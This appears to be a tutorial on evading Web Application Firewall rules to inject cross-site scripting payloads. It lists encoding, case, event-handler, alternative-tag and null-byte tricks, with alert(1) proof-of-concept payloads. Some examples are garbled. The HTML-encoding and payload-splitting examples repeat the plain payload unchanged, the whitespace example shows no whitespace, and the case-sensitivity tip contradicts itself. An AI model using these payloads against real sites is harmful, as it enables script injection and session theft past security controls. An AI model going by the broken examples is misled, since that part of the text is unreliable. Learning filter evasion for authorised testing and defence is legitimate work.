TL;DR
Web Application Firewalls (WAFs) try to stop malicious attacks like Cross-Site Scripting (XSS). However, they aren’t perfect. This guide shows common techniques attackers use to bypass WAF rules and successfully inject XSS payloads. It’s important to understand these methods for both testing your own applications and defending against them.
Understanding the Problem
WAFs work by inspecting HTTP requests and blocking those that match known attack patterns. They often use regular expressions or other pattern-matching techniques. Bypassing a WAF means finding ways to craft XSS payloads that don’t trigger these rules, but still execute malicious JavaScript in the victim’s browser.
Bypass Techniques
- Case Sensitivity
- Many WAFs are case-insensitive. Try variations like
<ScRiPt>alert(1)</ScRiPt>.
- Many WAFs are case-insensitive. Try variations like
- HTML Encoding
- Encode characters using HTML entities. For example, replace ‘<' with
<, ‘>’ with
>, and ‘&’ with
&. WAFs might not decode these before inspection.
- Example: Instead of
<script>alert(1)</script>, try
<script>alert(1)</script>.
- Encode characters using HTML entities. For example, replace ‘<' with
- URL Encoding
- Similar to HTML encoding, URL encode characters. Use an online encoder if needed.
- Example:
%3Cscript%3Ealert(1)%3C/script%3E.
- Double Encoding
- Encode the encoded characters again. This can sometimes confuse WAFs.
- Example:
%253Cscript%253Ealert(1)%253C/script%253E.
- Whitespace and Comments
- Insert whitespace or comments within tags.
- Example:
<script>alert(1)</script>,
<script%20/%3Ealert(1)%3C/script>.
- Tag Attributes
- Use XSS within tag attributes.
- Example:
<img src=x onerror=alert(1)>,
<input type="text" onfocus=alert(1) autofocus>.
- Event Handlers
- Utilize various event handlers.
- Example:
<body onload=alert(1)>,
<a href="javascript:alert(1)">Click me</a>.
- Payload Splitting
- Break the payload into multiple parts.
- Example:
<script>alert(1)</script>.
- Using Different Tags
- Try alternative tags that can execute JavaScript.
- Example:
<svg onload=alert(1)>,
<details open ontoggle=alert(1)>.
- Bypassing Filters with Null Bytes
- In some older systems, a null byte (%00) can terminate the string being filtered.
- Example:
<img src="x%00onerror=alert(1)">. This is less common now due to improved security practices.
Important Considerations
- Context Matters: The effectiveness of these techniques depends on the specific WAF rules and the application’s input validation.
- Testing is Crucial: Always test your payloads thoroughly to ensure they bypass the WAF and execute successfully in different browsers.
- Ethical Hacking: Only attempt these techniques on systems you have explicit permission to test. Unauthorized access is illegal.